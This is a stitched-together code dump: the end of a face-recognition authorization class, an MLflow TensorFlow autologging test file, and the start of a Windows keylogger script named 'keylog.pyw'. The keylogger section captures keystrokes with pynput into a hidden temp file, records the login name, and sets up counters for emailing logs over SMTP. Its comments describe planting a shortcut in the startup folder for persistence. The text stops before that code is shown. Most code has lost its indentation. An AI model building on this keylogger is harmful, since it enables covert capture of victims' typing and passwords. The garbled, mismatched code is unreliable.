            target = self.run_opencv_face_recognition
        elif method == 'dlib_face_recognition':
            target = self.run_dlib_face_recognition
        else:
            raise ValueError("Unknown authorization method: {0}".format(method))
listener_thread = Thread(target=target)
listener_thread.daemon = True
listener_thread.start()
def stop(self):
Logger.debug("Stop authorization thread")
self.thread_running = False
if __name__ == "__main__":
pass
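    # Minimal usage sketch (assumptions: a webcam at index 0, trained data under
    # ../trained_data, and a callback that just prints the authorized name):
    #
    #     camera = cv2.VideoCapture(0)
    #     auth = Authorization(camera, callback=lambda name: print("authorized:", name))
    #     auth.run(method='opencv_face_recognition', debug=True)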
|
test_tensorflow2_autolog.py
|
# pep8: disable=E501
import collections
import pytest
import sys
import pickle
from packaging.version import Version
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import layers
import mlflow
import mlflow.tensorflow
from mlflow.tensorflow._autolog import _TensorBoard, __MLflowTfKeras2Callback
import mlflow.keras
from mlflow.tracking.client import MlflowClient
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
np.random.seed(1337)
SavedModelInfo = collections.namedtuple(
"SavedModelInfo",
["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
yield
tf.keras.backend.clear_session()
@pytest.fixture
def random_train_data():
return np.random.random((150, 4))
@pytest.fixture
def random_one_hot_labels():
n, n_class = (150, 3)
classes = np.random.randint(0, n_class, n)
labels = np.zeros((n, n_class))
labels[np.arange(n), classes] = 1
return labels
@pytest.fixture
def clear_tf_keras_imports():
"""
Simulates a state where `tensorflow` and `keras` are not imported by removing these
libraries from the `sys.modules` dictionary. This is useful for testing the interaction
between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
"""
sys.modules.pop("tensorflow", None)
sys.modules.pop("keras", None)
@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
"""
Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
be tested successfully
"""
mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
model = tf.keras.Sequential()
model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
model.add(layers.Dense(3, activation="softmax"))
model.compile(
optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
)
return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
random_train_data, random_one_hot_labels, log_models
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(log_models=log_models)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_id = client.list_run_infos(experiment_id="0")[0].run_id
artifacts = client.list_artifacts(run_id)
artifacts = map(lambda x: x.path, artifacts)
assert ("model" in artifacts) == log_models
@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
history = model.fit(
data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
run, history = tf_keras_random_data_run
data = run.data
assert "accuracy" in data.metrics
assert "loss" in data.metrics
# Testing explicitly passed parameters are logged correctly
assert "epochs" in data.params
assert data.params["epochs"] == str(history.epoch[-1] + 1)
assert "steps_per_epoch" in data.params
assert data.params["steps_per_epoch"] == "1"
# Testing default parameters are logged correctly
assert "initial_epoch" in data.params
assert data.params["initial_epoch"] == str(history.epoch[0])
# Testing unwanted parameters are not logged
assert "callbacks" not in data.params
assert "validation_data" not in data.params
# Testing optimizer parameters are logged
assert "opt_name" in data.params
assert data.params["opt_name"] == "Adam"
assert "opt_learning_rate" in data.params
assert "opt_decay" in data.params
assert "opt_beta_1" in data.params
assert "opt_beta_2" in data.params
assert "opt_epsilon" in data.params
assert "opt_amsgrad" in data.params
assert data.params["opt_amsgrad"] == "False"
client = mlflow.tracking.MlflowClient()
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
num_of_epochs = len(history.history["loss"])
assert len(all_epoch_acc) == num_of_epochs == 10
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
every_n_iter = 5
num_training_epochs = 17
mlflow.tensorflow.autolog(every_n_iter=every_n_iter)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(
random_train_data,
random_one_hot_labels,
epochs=num_training_epochs,
initial_epoch=0,
)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])
@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
random_train_data, random_one_hot_labels
):
"""
tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
while other APIs use one-indexing. Accordingly, this test verifies that metrics are
produced in the boundary case where a model is trained for a single epoch, ensuring
that we don't miss the zero index in the tf.Keras case.
"""
mlflow.tensorflow.autolog(every_n_iter=5)
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=1)
client = mlflow.tracking.MlflowClient()
run_metrics = client.get_run(run.info.run_id).data.metrics
assert "accuracy" in run_metrics
assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
random_train_data, random_one_hot_labels
):
mlflow.tensorflow.autolog(every_n_iter=5)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
with mlflow.start_run():
# Pass `batch_size` as a positional argument for testing purposes
model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run_info = client.get_run(run_id)
assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
run, _ = tf_keras_random_data_run
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
assert "tensorboard_logs" in artifacts
model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
# pylint: disable=unused-argument
mlflow.tensorflow.autolog(every_n_iter=1)
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
if callback == "early":
# min_delta is set as such to guarantee early stopping
callback = tf.keras.callbacks.EarlyStopping(
monitor="loss",
patience=patience,
min_delta=99999999,
restore_best_weights=restore_weights,
verbose=1,
)
else:
class CustomCallback(tf.keras.callbacks.Callback):
def on_train_end(self, logs=None):
print("Training completed")
callback = CustomCallback()
history = model.fit(
data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
):
return get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" in metrics
restored_epoch = int(metrics["restored_epoch"])
# In this test, the best epoch is always the first epoch because the early stopping callback
# never observes a loss improvement due to an extremely large `min_delta` value
assert restored_epoch == initial_epoch
assert "loss" in history.history
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
loss = history.history["loss"]
assert len(metric_history) == len(loss) + 1
steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
# Check that MLflow has logged the correct steps
assert steps == [*history.epoch, callback.stopped_epoch + 1]
# Check that MLflow has logged the correct metric values
np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
callback,
restore_weights,
patience,
initial_epoch,
random_train_data,
random_one_hot_labels,
):
patched_metrics_data = []
# Mock patching BatchMetricsLogger.record_metrics()
# to ensure that expected metrics are being logged.
original = BatchMetricsLogger.record_metrics
with patch(
"mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
) as record_metrics_mock:
def record_metrics_side_effect(self, metrics, step=None):
patched_metrics_data.extend(metrics.items())
original(self, metrics, step)
record_metrics_mock.side_effect = record_metrics_side_effect
run, _, callback = get_tf_keras_random_data_run_with_callback(
random_train_data,
random_one_hot_labels,
callback,
restore_weights,
patience,
initial_epoch,
)
patched_metrics_data = dict(patched_metrics_data)
original_metrics = run.data.metrics
for metric_name in original_metrics:
assert metric_name in patched_metrics_data
restored_epoch = int(patched_metrics_data["restored_epoch"])
assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
run, history, callback = tf_keras_random_data_run_with_callback
metrics = run.data.metrics
params = run.data.params
assert "patience" in params
assert params["patience"] == str(callback.patience)
assert "monitor" in params
assert params["monitor"] == "loss"
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == callback.patience + 1
assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
run, history = tf_keras_random_data_run_with_callback[:-1]
metrics = run.data.metrics
params = run.data.params
assert "patience" not in params
assert "monitor" not in params
assert "verbose" not in params
assert "mode" not in params
assert "stopped_epoch" not in metrics
assert "restored_epoch" not in metrics
assert "loss" in history.history
num_of_epochs = len(history.history["loss"])
client = mlflow.tracking.MlflowClient()
metric_history = client.get_metric_history(run.info.run_id, "loss")
# Check the test epoch numbers are correct
assert num_of_epochs == 10
assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
tmpdir, random_train_data, random_one_hot_labels, positional
):
"""
TensorFlow autologging passes new callbacks to the `fit()` / `fit_generator()` function. If
preexisting user-defined callbacks already exist, these new callbacks are added to the
    user-specified ones. This test verifies that the new callbacks are added to the list without
permanently mutating the original list of callbacks.
"""
mlflow.tensorflow.autolog()
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
callbacks = [tensorboard_callback]
model = create_tf_keras_model()
data = random_train_data
labels = random_one_hot_labels
if positional:
model.fit(data, labels, None, 10, 1, callbacks)
else:
model.fit(data, labels, epochs=10, callbacks=callbacks)
assert len(callbacks) == 1
assert callbacks == [tensorboard_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
tmpdir, random_train_data, random_one_hot_labels
):
tensorboard_callback_logging_dir_path = str(tmpdir.mkdir("tb_logs"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
tensorboard_callback_logging_dir_path, histogram_freq=0
)
mlflow.tensorflow.autolog()
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10, callbacks=[tensorboard_callback])
assert os.path.exists(tensorboard_callback_logging_dir_path)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
tmpdir, random_train_data, random_one_hot_labels
):
from unittest import mock
from mlflow.tensorflow import _TensorBoardLogDir
mlflow.tensorflow.autolog()
mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
mock_log_dir_class.return_value = mock_log_dir_inst
data = random_train_data
labels = random_one_hot_labels
model = create_tf_keras_model()
model.fit(data, labels, epochs=10)
assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
train = pd.read_csv(
os.path.join(os.path.dirname(__file__), "iris_training.csv"),
names=CSV_COLUMN_NAMES,
header=0,
)
train_y = train.pop("Species")
def input_fn(features, labels, training=True, batch_size=256):
"""An input function for training or evaluating"""
# Convert the inputs to a Dataset.
dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
# Shuffle and repeat if you are in training mode.
if training:
dataset = dataset.shuffle(1000).repeat()
return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_for_single_epoch_training(tmpdir):
    """
    Epoch indexing behavior is inconsistent across TensorFlow 2 APIs: tf.Keras uses
    zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
    This test verifies that metrics are produced for tf.Estimator training sessions
    in the boundary case where a model is trained for a single epoch, ensuring that
    we capture metrics from the first epoch at index 1.
    """
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
# pylint: disable=no-name-in-module
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE,
EMBEDDING_DIM,
name="embedding",
mask_zero=True,
input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
model = create_tf_keras_model()
def generator():
while True:
yield random_train_data, random_one_hot_labels
with mlflow.start_run() as run:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
params = run.data.params
metrics = run.data.metrics
assert "epochs" in params
assert params["epochs"] == "10"
assert "steps_per_epoch" in params
assert params["steps_per_epoch"] == "1"
assert "accuracy" in metrics
assert "loss" in metrics
@pytest.mark.large
def test_tf_keras_model_autolog_registering_model(random_train_data, random_one_hot_labels):
registered_model_name = "test_autolog_registered_model"
mlflow.tensorflow.autolog(registered_model_name=registered_model_name)
with mlflow.start_run():
model = create_tf_keras_model()
model.fit(random_train_data, random_one_hot_labels, epochs=10)
registered_model = MlflowClient().get_registered_model(registered_model_name)
assert registered_model.name == registered_model_name
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
random_train_data, random_one_hot_labels
):
"""
Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
`tf.keras` Models did not work due to conflicting patches set by both the
`mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
"""
mlflow.autolog()
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_data = client.get_run(run.info.run_id).data
assert "accuracy" in run_data.metrics
assert "epochs" in run_data.params
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
def test_callback_is_picklable():
cb = __MLflowTfKeras2Callback(
log_models=True, metrics_logger=BatchMetricsLogger(run_id="1234"), log_every_n_steps=5
)
pickle.dumps(cb)
tb = _TensorBoard()
pickle.dumps(tb)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.1.0"), reason="This test requires tensorflow >= 2.1.0"
)
def test_tf_keras_autolog_distributed_training(random_train_data, random_one_hot_labels):
# Ref: https://www.tensorflow.org/tutorials/distribute/keras
mlflow.tensorflow.autolog()
with tf.distribute.MirroredStrategy().scope():
model = create_tf_keras_model()
fit_params = {"epochs": 10, "batch_size": 10}
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, **fit_params)
client = mlflow.tracking.MlflowClient()
assert client.get_run(run.info.run_id).data.params.keys() >= fit_params.keys()
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
"""
Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
the correct module after `mlflow.autolog()` is called, guarding against previously identified
compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
setting up autologging import hooks.
"""
mlflow.autolog()
import tensorflow.keras
from keras.api._v2.keras import Model as ModelV2
assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow # pylint: disable=unused-variable,unused-import,reimported
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
import keras # pylint: disable=unused-variable,unused-import
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow.keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
# NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
mlflow.autolog()
import keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
keylog.pyw
|
#first import all necessary packages
from pynput.keyboard import Key, Listener
import os
import shutil
import datetime
import winshell
from win32com.client import Dispatch
import tempfile
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import threading
import socket
#first make a folder in temp
save = tempfile.mkdtemp("screen")
print(save) #just print the path so we know the actual temp location
cwd = os.getcwd() #it returns current working directory
source = os.listdir() #gives list of files in current directory
#first we use the datetime module to get the current system date and time; based on that we name the file
dateAndtime = datetime.datetime.now().strftime("-%Y-%m-%d-%H-%M-%S")
#now save filename with the datetime and also mention the temp folder path
filename = save+"\key_log"+dateAndtime+".txt"
open(filename,"w+")#w+ use to create the file which does not exist, creates a new file for writing.
keys=[]#use this list to store the keyboard inputs
count = 0 #counter used to decide when to call the send_email function
countInternet = 0
word = "Key."#use to match with keyboards keys
username = os.getlogin() #looks for current username
# now first we have to create a shortcut of the file and store it in the Windows startup folder
# so first create the destination path
